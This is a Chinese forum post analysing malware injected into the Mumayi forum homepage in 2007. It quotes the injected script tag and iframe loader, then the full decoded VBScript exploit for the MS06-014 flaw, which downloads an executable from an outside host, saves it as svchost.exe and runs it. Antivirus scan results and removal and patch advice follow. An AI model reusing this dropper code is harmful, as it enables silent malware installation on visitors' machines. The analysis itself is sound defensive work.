| 木蚂蚁论坛被挂马,NOD32用户安然无虞! 这次的马在主页(bbs.mumayi.net)上面,源代码被加上了这样一句 <script id="advjs" src="http://web.77276.com/adv.js?showmatrix_num=056"></script> 根据上面链接的showmatrix_num=056和adv.js中的内容: document.write("<iframe src=\"http://web.77276.com/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>"); 可以知道这个会调用http://web.77276.com/1/056.htm这个网页 而这个056.htm有在跳转多一次,跳转到了http://web.77276.com/0.htm,打开源文件一看,N多三位数字,明显就是ASCII码了,转换他们后狐狸终于露出尾巴了,看看它吧: on error resume next tc = "http://do.77276.com/0.exe" fname1="svchost.exe" fname2="svchost.vbs" Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t") df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"BD96C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36" str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP" str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am" Set x = df.CreateObject(str,"") set S = df.createobject(str5,"") S.type = 1 str6="G"&"E"&"T" x.Open str6, tc, False x.Send set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close fname2= F.BuildPath(tmp,fname2) set ts = F.OpenTextFile(fname2, 2, True) ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")" sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0" ts.writeLine sql ts.close if F.FileExists(fname1)=true then if F.FileExists(fname2)=true then set Q = df.createobject("She"&"ll."&"App"&"li"&"ca"&"tion","") dc="o"&"p"&"e"&"n" Q.ShellExecute fname2,"","",dc,0 end if End if 下载http://do.77276.com/0.exe到临时文件夹下面,名字为svchost.exe,并创建svchost.vbs来调用svchost.exe 下面是多引擎扫描对0.exe的扫描结果,可以看出结果不太一致,而且在虚拟机中运行是出错,故暂时无法说清楚是哪个病毒,但扫描结果倾向于viking的较多,估计为viking AhnLab-V3 2007.3.24.1 03.24.2007 Win32/Viking.suspicious AntiVir 7.3.1.44 03.23.2007 TR/Crypt.NSPM.Gen Authentium 4.93.8 03.24.2007 Possibly a new variant of W32/PWStealer.gen1 Avast 4.7.936.0 03.23.2007 Win32:Tibs-ADO AVG 7.5.0.447 03.24.2007 no virus found BitDefender 7.2 03.25.2007 GenPack:Win32.Worm.Viking.IZ CAT-QuickHeal 9.00 03.23.2007 (Suspicious) - DNAScan ClamAV devel-20070312 03.25.2007 no virus found DrWeb 4.33 03.25.2007 Win32.HLLW.Gavir.54 eSafe 7.0.14.0 03.22.2007 suspicious Trojan/Worm eTrust-Vet 30.6.3506 03.23.2007 Win32/Looked.HN Ewido 4.0 03.24.2007 no virus found FileAdvisor 1 03.25.2007 no virus found Fortinet 2.85.0.0 03.25.2007 suspicious F-Prot 4.3.1.45 03.23.2007 W32/PWStealer.gen1 F-Secure 6.70.13030.0 03.24.2007 Viking.gen Ikarus T3.1.1.3 03.25.2007 Trojan-PWS.Win32.OnLineGames.id Kaspersky 4.0.2.24 03.25.2007 no virus found McAfee 4991 03.23.2007 no virus found Microsoft 1.2306 03.25.2007 no virus found NOD32v2 2143 03.25.2007 Win32/Pacex.Gen Norman 5.80.02 03.23.2007 Viking.gen Panda 9.0.0.4 03.24.2007 Suspicious file Prevx1 V2 03.25.2007 Trojan.SystemPoser Sophos 4.15.0 03.23.2007 no virus found Sunbelt 2.2.907.0 03.24.2007 no virus found Symantec 10 03.25.2007 W32.Lo |
如果在临时文件夹下面发现了svchost.vbs和svchost.exe这两个文件,建议立刻进行查杀,并打上MS06-014漏洞补丁,http://www.microsoft.com/china/t ... letin/ms06-014.mspx |
| 欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) | Powered by Discuz! 7.2 |